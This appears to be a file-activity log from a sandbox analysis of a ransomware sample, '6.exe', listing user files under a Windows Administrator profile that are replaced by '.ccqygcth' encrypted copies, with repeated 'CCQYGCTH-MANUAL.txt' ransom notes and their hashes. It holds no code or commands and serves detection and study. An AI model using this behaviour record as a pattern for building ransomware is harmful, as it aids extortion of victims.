C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.ccqygcth
binary
MD5: 2da3c3a0cfbe93bc773d365f24cbd757
SHA256: c8c51d6d7165eaff8d5aaf86df29ce56eaf142350d19e7baa6f8907549649716
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.ccqygcth
binary
MD5: 2a04855e96c645a10bcc268b19786e23
SHA256: aac5613ad89b21c3f1e223d8b5eeedd3a6d7213f72a46357fabfa66ed45ed2f6
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf.ccqygcth
binary
MD5: d2fc1a582ffe23bf30647a5d8cd6140e
SHA256: 14209131fef96ac9573fa8a9ee0d8395bd86b857103e40c23fcf3f68e52c1a01
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf.ccqygcth
binary
MD5: b0a35c9f123023610f2407c2c9d1762e
SHA256: 4877a860d574b16454f1b7a7b8bf2e5029c98cfa32acd3c28ccd4784cadf29c5
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.ccqygcth
binary
MD5: e969e3323349fba36b454d07353eacfa
SHA256: 1421d9763ca92ebe9a428822a5dc4d1bb06713a8c2bbd64f8df1f772c66fae7a
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.ccqygcth
binary
MD5: cb9605a40c6b9ee471e5726ca5b3682d
SHA256: 1469e55966af7217d6c06e8c0d0aa093df93788998229042fba04aa868b977d5
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf.ccqygcth
binary
MD5: 6679410ff71f43f441717d7015348acc
SHA256: 679e67f29123efa5f06b631ff9a24b4565d31ea7c7384ce20ae79f39f857caa7
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf.ccqygcth
binary
MD5: f09780936b6d9139d5850b46a5945a21
SHA256: 6afe46ca51a6c3d2cc1bbd4bd0a571b4a33ccf300e741d4f9232485b28243a4b
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf.ccqygcth
binary
MD5: 85fdfbbac50aa2bf5743b23413ae1c00
SHA256: 9dbcade17d7a3f8c53da7b191dfb124cec2d82568d87f14cd0dc12e563cc291f
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.ccqygcth
binary
MD5: 3907ea040b8664c541929b67dba0e367
SHA256: 4fc3a972e58915c7d4085f0134a661ad451b448699b54484765fa78a5e2cfc22
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.ccqygcth
binary
MD5: bbfb269a166d59c4716b7462633001d2
SHA256: dac4fa164ab7bb36c6ccda5a9b28f059255b7a447b2e2833c3900d87be284e10
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf.ccqygcth
binary
MD5: 1f08036973cd0c03412d979dc3a6217f
SHA256: d9f66ad2a5b3dfa02c42dec958a2bbaf0213ec3325a653452858dda3cb24c760
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif.ccqygcth
binary
MD5: ee70edcde869687abc9d142973a6b8e4
SHA256: 724a3b511aa64bc57f7317b5714cf43eb703efcb935d5d089e26688698934706
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif.ccqygcth
binary
MD5: 99836e85cdbd4b6efa6a81444360913d
SHA256: 396c19e3db394af312ad827d0040f06ed232abe2098e92c4411ec11ad7a7ef1b
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.ccqygcth
binary
MD5: 2e6b89ec52b701a94537b0ac0fa0710d
SHA256: d930567bb19af0a064f7dd7d336cc8fb0731a2a51588ee9b7f1ed71d6b762cf3
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.ccqygcth
binary
MD5: 281a2bd3688b7b9fa4854bac935a5f21
SHA256: 015938b27fcdc3b3ebef7140ac1c85ca28618372a4092d2002e2774e5a03acf2
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.ccqygcth
binary
MD5: 1b85725ae9539b0206fb2ad5d5686490
SHA256: 98c25acd06ef23767dac773b4b0a39bd23d97c55e4f4fc3277efb2d605241210
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml.ccqygcth
binary
MD5: 3fd500fabb4f37d925c9a35be0386c5b
SHA256: 85176596b57aa54350460b72b77e27bd463bfe324b9f1e31347513ab8a282def
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.ccqygcth
binary
MD5: 6e29bb47b8135c0b39756410776bf6f0
SHA256: ed56b7c27138f6b929f49ce05df9e42835a30acc4d97224f7177552b9e932e89
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.ccqygcth
binary
MD5: 8d9fd7c1c2e29f0807a3373c2b6ebdd1
SHA256: 8db21a83f585b0315985be5fa3a83af983bc246dd42b34f04c65b5a2191541ac
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log.ccqygcth
binary
MD5: 313ea4eb6fc0c2d98fb09e21a44ddd90
SHA256: c2a5bd081e43c785418815374c4b746ef4cafc2fb5d0f1c0b699fed040c8195d
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log.ccqygcth
binary
MD5: 12cc66ec42604efa31604373b198a283
SHA256: b590d3a19cb19b306858f270a1960eb2c944553f57d67fd5594ed9b93ff6b471
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk.ccqygcth
binary
MD5: 424d392949f0229ab5c01646e94593c3
SHA256: dd37bdec2ba754c85dd3bad904e845d31de506167d350328e36cd14520f3c9fd
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.ccqygcth
binary
MD5: 371d2011fab72802841a902a19bafd17
SHA256: 36e6d2ebd59669e975889cd23230b76aa6e341d697be841a8bc056907906b971
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.ccqygcth
binary
MD5: 2891479b513ac7581e239fa79ca16629
SHA256: 7b44c4272f5de4d6d293694ee84309884e309e6ca123b9057c1f9d250e8e7fda
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.ccqygcth
binary
MD5: 7392bcbb229f48bbdc06027da98adf6b
SHA256: 07867f17c1438f685fdf713994c859125419ef2fa36dce6b793589bf104a777f
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount.ccqygcth
binary
MD5: 895f4fae614768c418235069891c149e
SHA256: 7f30bb0f7be3967d956382247a0b797b671ac6ada8ab99a44d29ba6243037a95
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount.ccqygcth
binary
MD5: dba28171abc94c23aa930564187e46b0
SHA256: 31cce44eb3a91ffe76eaaf7f8af9509d2d4d16c190394c4bec82b7c5d4a66539
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl.ccqygcth
binary
MD5: 0d0e1a69451817156f12b91ccb14e9ee
SHA256: 4485d3b0eb5e0c05c80fb0ae7deaa8aeaf6a90389b2b4c5992bfbe8cb1aaedd1
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount.ccqygcth
binary
MD5: c1b0c5bdada3edc2d49a108d7d82fdab
SHA256: 1a580b7ec47b234eb03a21a4d37e19710b52331e7e75a13b48a954d3c2fc727d
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl.ccqygcth
binary
MD5: 89e3cafb059c3a425f5361eaada6f55e
SHA256: e48e59763e4ed1e7a570e64739403119474044be987e842d6ba6c15dfbcf0999
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl.ccqygcth
binary
MD5: 6f5f7d476330675596b4d1d17ea68c26
SHA256: 639705268b990bc8edf73037632aa89647fe2caae17b8551d90d951e04e26e95
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl.ccqygcth
binary
MD5: 7c1653f7818d059f56ccdae75dae792d
SHA256: 30dec1465e26c024a0b8da8e61cae5019b5b1f7adf12c06b230245a70cdb0a12
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl.ccqygcth
binary
MD5: 39b86504e3a35323f25688850956b5fb
SHA256: ceb6e5bd5dadcc4dd54521a808ca21f107bfa235fc3b3f279846dfaca53fc0a7
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl.ccqygcth
binary
MD5: 63ca1d1b363757da76743025f96079b4
SHA256: b12899169cfae529a5472c96d722884cd3d3dd0bd0b3f6fbb46d032f1016e8ea
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl.ccqygcth
binary
MD5: 0a6fffbcbcde493f0b98831bcb407f96
SHA256: 878ef7a44bded0589e720032bf3aa2bc2c9237f8aa2836d027321eade57c2761
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl.ccqygcth
binary
MD5: 5b877a0b4f23838d9cea11792d6c3a04
SHA256: e987769b69237e63682cc6b50134eab164dc190320b920fb12a4183dccb72157
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl.ccqygcth
binary
MD5: adde8347450153dc18c0614315653c2a
SHA256: 6a71c75f884c3f6f05c782034139605b01581849f38a39c2c4179e3812c69986
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl.ccqygcth
binary
MD5: cb7e43fc2bd1490b82faada39f61fbfa
SHA256: 7104b72286ddcd85082170bac8c8a0c8eba126c1d77825a80fca910b876bd9c8
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl.ccqygcth
binary
MD5: b1291f90bf6073226743bfe271676591
SHA256: ea7afa764326c0e268876a482e7b4ea943875cdb1426bfc4baed6f6825be953d
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl.ccqygcth
binary
MD5: b2372484f30289d028069cc42016690f
SHA256: 52470ed4f0cc2bae0e48c2c2b6b6670a9380bc2abb1788ec2810377a93d15fe0
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb.ccqygcth
binary
MD5: b58980b72fc3af9fbea508697db7dcb8
SHA256: a719efe92ba1a0b528a708927c16e0595c5fd9e3dd9f7099fcb419d6683fde79
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb.ccqygcth
binary
MD5: e4b67306e0613f772dd3daabe3c5a330
SHA256: 2d1c4ba145a3cbfec97b55a9a5db8b9556fc30f84a9b43b219e33c7da30d21ed
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\VM3JD5NM\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.ccqygcth
ini
MD5: 83bad76f433db871952169fdc9338c90
SHA256: 2d360a9616a6639566fbc0d991e2581690c893ec59f06c831b069cf39fd96c3c
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\G4PHTCUR\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\HPSK10OB\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\9RI45C46\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat.ccqygcth
binary
MD5: efd4685ccf511218261824ead76cce80
SHA256: a0a31cd46c8fe4888d8e2b9d777782699c8cfcb6e651af5843e65ae45c5129f2
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.ccqygcth
binary
MD5: 904b259c5788efd69ed4872882dfd089
SHA256: d0897e78778aec6444bfab2197bb68459c2f7e860f9df558f92e724b36b3262d
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.ccqygcth
binary
MD5: b0e67cb47c20a754cc6db3eadc2bb7fb
SHA256: 23885bc7319eb3a4e5ca2030edc05a38c3ae14d9ffb471e1d80f2d071ba21ad1
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.ccqygcth
binary
MD5: 579ba107d49ea4ee0bd56e8054fded03
SHA256: 9ebadf0e0cc272e3269cf842501793a0d1a40f989368debe00dfbc8f1776bf85
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.ccqygcth
binary
MD5: 7648ce3b4ba3910df3812d4cd812b278
SHA256: 2bc1f92a58948ab07850f9d282643d19358dcecc9b918897b8e8a541fe130481
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.ccqygcth
pgm
MD5: 2b5f3193697f32b9e6dc6330fbc1d952
SHA256: 25de6b64e3bb3f7c0282fd1138446c6b96e74b62e5a650ac930b174443763fe3
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms.ccqygcth
binary
MD5: d62738310f8015f0d80aed6ab3c42ffe
SHA256: 7023eb66f41f353dd1dd5f9b94956dcdd9f2526ea719f7cd18b25d8053f149e3
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms.ccqygcth
binary
MD5: 9f3a7c4f55805b0681a15f7ba4f05181
SHA256: 1e4d43b520b53a56a4849eb6570b3d543fc1a6469cefec28f4452b4ded964c5e
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Credentials\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
